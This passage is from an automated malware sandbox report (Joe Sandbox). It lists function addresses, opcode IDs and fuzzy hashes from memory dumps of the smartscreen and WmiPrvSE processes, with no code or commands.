                                                                                                                            • Opcode Fuzzy Hash: 86c2bae74f5d9032e1ca96db4ce6a54dc955d985b0d5217def6fb71d3dd08399
                                                                                                                            • Instruction Fuzzy Hash: B8E04F2194FBC04FC75B9B3488798507F60DE1721174A44EFC089CF5F3D5199849C702
                                                                                                                            Function 00007FFD9B880B92 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction ID: b4070bef994066c768f35d14cf6f1287b51c27c28366d0589b2e135682b2f807
                                                                                                                            • Opcode Fuzzy Hash: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction Fuzzy Hash: B6D05E3166EA9A4FEA02A778D85A4547BA0EB1F215B8A10E2D00CCB5A2D51559998701
                                                                                                                            Function 00007FFD9B884F9A Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction ID: a33d561a8ad8659659915b201ae700816c32bee14be2c8719a6dee4b5df13911
                                                                                                                            • Opcode Fuzzy Hash: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction Fuzzy Hash: F4E0ED30F1991A8BF7B4E754C8643B962519F9C300F1601B5D91EA72E5DD386F818640
                                                                                                                            Function 00007FFD9B8B2960 Relevance: .0, Instructions: 18COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b8b1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                            Function 00007FFD9B8BC388 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b8b1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                                                            • Instruction ID: 690852d90a905d95d3744771b3f0a27b9dd3364ef2b916afb8aa5078e4f83c6f
                                                                                                                            • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                                                            • Instruction Fuzzy Hash: 7BD02230B51C040FC70CA73888988303390EB6E20778104A8D00BC72B1D92ADC88CBC0
                                                                                                                            Function 00007FFD9B8B79D8 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b8b1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                                                                                            • Instruction ID: 3909ef338fcbf0e64a2b4f8006e8a92db88e95d9b8dbd40c6b72f56c8aa248f4
                                                                                                                            • Opcode Fuzzy Hash: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                                                                                            • Instruction Fuzzy Hash: ABD02230B508040FC71CA7388C588303390EB6E206B8100A8D00AC72B1D92ADC89CB80
                                                                                                                            Function 00007FFD9B8B848C Relevance: .0, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b8b1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction ID: bac602afe47e4af8c8b911321a91787fdb61117f5abec0495fbb5b38943d6ce6
                                                                                                                            • Opcode Fuzzy Hash: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction Fuzzy Hash: 1ED0A73194B5844FCB0E9B3584A8C607F50DF5A20474940ECC04A8F1B3D9259949C700
                                                                                                                            Function 00007FFD9B881270 Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction ID: a79947f93788c4bb4d7425d32d52921a7fc803f859ecaf7a74596b024689d4bc
                                                                                                                            • Opcode Fuzzy Hash: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction Fuzzy Hash: B2C01230611C0C8FCA48EB28C894D14B3A1FB1D304B960094E00DCB2B1E62AECC2CB40
                                                                                                                            Function 00007FFD9B8806A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction ID: 729d7b0d783b2e222e1cea709e61e589422f795faa21dd2015af816b71e945a8
                                                                                                                            • Opcode Fuzzy Hash: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction Fuzzy Hash: 4CC04C05F7BE5F03F835B3EE98660ACA1405FDDA14FE70172D56D400F19C6E22D50196
                                                                                                                            Function 00007FFD9B894CA2 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b890000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction ID: 0c3c89d43e32c33064fcd2f4e26b1c1529bd70eee51dfa00418d77cb50b1d71b
                                                                                                                            • Opcode Fuzzy Hash: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction Fuzzy Hash: B8D0C730A0950D8BDA69EB8494607797251EF4D344F150478D81E93197DD2559538715
                                                                                                                            Function 00007FFD9B882A44 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a180796ea4886ecd218953e3b26ace5cadea8c6be566e83d5ff75a43e6ac7909
                                                                                                                            • Instruction ID: 3037b80b779712991bc3bd9aa1667f934823c203318ac3f0546e937d68976c14
                                                                                                                            • Opcode Fuzzy Hash: a180796ea4886ecd218953e3b26ace5cadea8c6be566e83d5ff75a43e6ac7909
                                                                                                                            • Instruction Fuzzy Hash: 72C04C10F1CC1A06F7597358546167E44539B48644F9544B5E42EE73CEDD6DAD1202C7
                                                                                                                            Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction ID: 1d8eea679e8608322d840100f89eeddaf120d52de055204a0bac83ee4694f40d
                                                                                                                            • Opcode Fuzzy Hash: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction Fuzzy Hash: 3EB01200D77C4F02E43833FA0C9206470405F8D104FC30070D42D400A1985E12940282

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8809B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000025.00000002.2057253613.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_37_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: 98cb04ec4c69b825196d444a49bdf79c7170145f8ea94898da4343ee042ea434
                                                                                                                            • Instruction ID: 50dda8b2e71c9c6ab8bbcc3f16dbd51bf8c74e3cf593e2378437cd06dd4167a8
                                                                                                                            • Opcode Fuzzy Hash: 98cb04ec4c69b825196d444a49bdf79c7170145f8ea94898da4343ee042ea434
                                                                                                                            • Instruction Fuzzy Hash: 9E41F287F1847385E31E33FD79299EC5B40DF8123CB0846B7E16E8A0C7AD88648792E5

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B8B0D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e1cb89000ba939ec2ea751d59bf7ffd72106baea2933d6dc1a122d77aaa88179
                                                                                                                            • Instruction ID: faa248726507a8a619cd807b632d7c3f9dbf8af6c43b00a3e783192a293d45db
                                                                                                                            • Opcode Fuzzy Hash: e1cb89000ba939ec2ea751d59bf7ffd72106baea2933d6dc1a122d77aaa88179
                                                                                                                            • Instruction Fuzzy Hash: D991F271A19A9D8FEBA8DB6888657A9BFE1FF59310F4001BAD049D72E2CB742401C741
                                                                                                                            Function 00007FFD9B8B08D0 Relevance: .2, Instructions: 155COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dbe88b850800421416ae2e9ad06a61d4c195f5c6778c59404e2c5c325cdb5ccc
                                                                                                                            • Instruction ID: e5fd041304974c1192f7e43f8c2f18084e9b3134c0b9d5cb49b3aacc5d27e8d7
                                                                                                                            • Opcode Fuzzy Hash: dbe88b850800421416ae2e9ad06a61d4c195f5c6778c59404e2c5c325cdb5ccc
                                                                                                                            • Instruction Fuzzy Hash: 10413B22B1C5294EE319B7BC74A96F97791EF89365B0405FBD00EC71EBDD18A84282C5
                                                                                                                            Function 00007FFD9B8B0C25 Relevance: .1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ebdf75fa417e5607e497bc3407ff3420b53469bf8f473e3a20ebc6f71dacbcc9
                                                                                                                            • Instruction ID: ad24cfd5d132e10a585ef2d211f12e6b76e5038b0dfbeaa130922208767b674e
                                                                                                                            • Opcode Fuzzy Hash: ebdf75fa417e5607e497bc3407ff3420b53469bf8f473e3a20ebc6f71dacbcc9
                                                                                                                            • Instruction Fuzzy Hash: 4B314931B1D26D8EE726ABB998751EC7B60EF45310F0541F7D0488B1E3DA3826468BC1
                                                                                                                            Function 00007FFD9B8B0998 Relevance: .1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2f16313763186ebda0e74cb1577ae4ed619fc9f7bd5d41c650961556a6a1ce63
                                                                                                                            • Instruction ID: 8d067eaf60ef3913d3d008e9fa098f52b710239f3a408bd728ac652953fef14e
                                                                                                                            • Opcode Fuzzy Hash: 2f16313763186ebda0e74cb1577ae4ed619fc9f7bd5d41c650961556a6a1ce63
                                                                                                                            • Instruction Fuzzy Hash: 53210720B2892D0FE758B76C946A679B6D6EF9C351F4100B9E40EC32E7DD24AC424685
                                                                                                                            Function 00007FFD9B8B11AD Relevance: .1, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1d3697025224b63f867c6cdd5a8cde77830fd245895e8b0175e39c9737379e04
                                                                                                                            • Instruction ID: 4a8451c46ff44ed493fdd18c4612be46384e55c3c750fcacf40c975e310ddef2
                                                                                                                            • Opcode Fuzzy Hash: 1d3697025224b63f867c6cdd5a8cde77830fd245895e8b0175e39c9737379e04
                                                                                                                            • Instruction Fuzzy Hash: DA316530A19A5E8FDB49EB64C8649B97BF1FF5A301B0505FAD009D71A7DB38A940CB50
                                                                                                                            Function 00007FFD9B8B0BB5 Relevance: .1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 76d06a741b86a37afdde76a2e3111247511311d0f87b4ea386e5fe88f251ce83
                                                                                                                            • Instruction ID: 2f5e523147b28a85870d94940bf458743292d4e5eb0239bf47d6dc4476345628
                                                                                                                            • Opcode Fuzzy Hash: 76d06a741b86a37afdde76a2e3111247511311d0f87b4ea386e5fe88f251ce83
                                                                                                                            • Instruction Fuzzy Hash: 7101D461B1D0368AE31A33ADF96A4EC3750DF45329B0941F3D01D8A4E3AE58688AD695
                                                                                                                            Function 00007FFD9B8B0C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4dfdf571dc60c2f0ffbc46ba2853f3945442903b96d5c0cca7b8846337d140d8
                                                                                                                            • Instruction ID: e170ec186bec61e937ce15fd707273119d3e25ec8363e9a9c8afd856a44f84f6
                                                                                                                            • Opcode Fuzzy Hash: 4dfdf571dc60c2f0ffbc46ba2853f3945442903b96d5c0cca7b8846337d140d8
                                                                                                                            • Instruction Fuzzy Hash: 2A11A531E1E69D8FE712DBB5886109D7BB0EF56710F1641F7C044DB2A2DA38664A8BC0
                                                                                                                            Function 00007FFD9B8B0C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c5937adc290b05fe9d6853b2c0af0fbcc49418cc268af712c49fcc9260e8931f
                                                                                                                            • Instruction ID: b790b1971ba83a87fc49fa2ca5aa5d04a77db139a67d5c9aa4c75420c8ef4b07
                                                                                                                            • Opcode Fuzzy Hash: c5937adc290b05fe9d6853b2c0af0fbcc49418cc268af712c49fcc9260e8931f
                                                                                                                            • Instruction Fuzzy Hash: 0D019231E1E29D9FE726DBB5886009D7FB0EF06710F1641F7C044DB2A2DA3867498B80
                                                                                                                            Function 00007FFD9B8B696B Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8f106bc5e5065f6ece3db1f174422950b83c7dc1054519d9b7dcd8f9952b8012
                                                                                                                            • Instruction ID: fb3b68a8008c8f9a77ccdaf7f6a6ad44322ad3acc300f70d6957c1ea45e3eb2d
                                                                                                                            • Opcode Fuzzy Hash: 8f106bc5e5065f6ece3db1f174422950b83c7dc1054519d9b7dcd8f9952b8012
                                                                                                                            • Instruction Fuzzy Hash: 16F0E1759089188FDF64DF04C8A4E99B3E1FBA9315F014199D40DD7264DB34EE84CF81
                                                                                                                            Function 00007FFD9B8B4F9A Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction ID: 468211acb448563b75d46701a40bb74c88adf27a8f38ef5583373a02e99a2993
                                                                                                                            • Opcode Fuzzy Hash: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction Fuzzy Hash: 52E01230F2952E8AF7F4A764C8653FD62519F89300F1601B9D90EE72E6DD286F818F80
                                                                                                                            Function 00007FFD9B8B0B92 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction ID: fa5d5ca48663555ccf448e13161d121dee55fa25a156640bd9ba048396533435
                                                                                                                            • Opcode Fuzzy Hash: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction Fuzzy Hash: C5D0973022EA8E4FEB02B378DC4A4547FA0EF0F210FCA10E2D008CB1B3C1004989CB00
                                                                                                                            Function 00007FFD9B8B1270 Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction ID: 97772ded02920c902799a8fc964db0c7625f184955989a82b2daf620663e4c1d
                                                                                                                            • Opcode Fuzzy Hash: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction Fuzzy Hash: 77C0123051180C9FCA48EB28C494D1473A0FB1D3047950094D00DC7171D626DCC1CB40
                                                                                                                            Function 00007FFD9B8B06A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction ID: 3f988ec7fcfa1ec4c1a35006f4d64b350271e2ad2076ae13a4469061f73c5a75
                                                                                                                            • Opcode Fuzzy Hash: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction Fuzzy Hash: 86C01200F6B62E00E83433BB98220ACA1009BCEA10FD20032C008400A1980D228909C6
                                                                                                                            Function 00007FFD9B8B2A44 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ce839c30b8533c9b1f8abecafc5ea36606caa54132ec4ee73e0f09748a64f925
                                                                                                                            • Instruction ID: 0c86e955be2f7a80cff50ff4030b3eb6254fda8291e513e81453f88b40b69207
                                                                                                                            • Opcode Fuzzy Hash: ce839c30b8533c9b1f8abecafc5ea36606caa54132ec4ee73e0f09748a64f925
                                                                                                                            • Instruction Fuzzy Hash: 5AC04C11F2C82A06E7697354542167E44539F44644F950475E41EEB3CECE5D6E1206C7
                                                                                                                            Function 00007FFD9B8B06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000029.00000002.2076013234.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction ID: cac897163d7a3af029cb981233693d2af9aff93eab614857f1aa87a5d86e1ec7
                                                                                                                            • Opcode Fuzzy Hash: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction Fuzzy Hash: 2AB01200DB745F00E43833FB085206470409B4D104FC21070D40D50091984D229406C2

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8B09B0 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
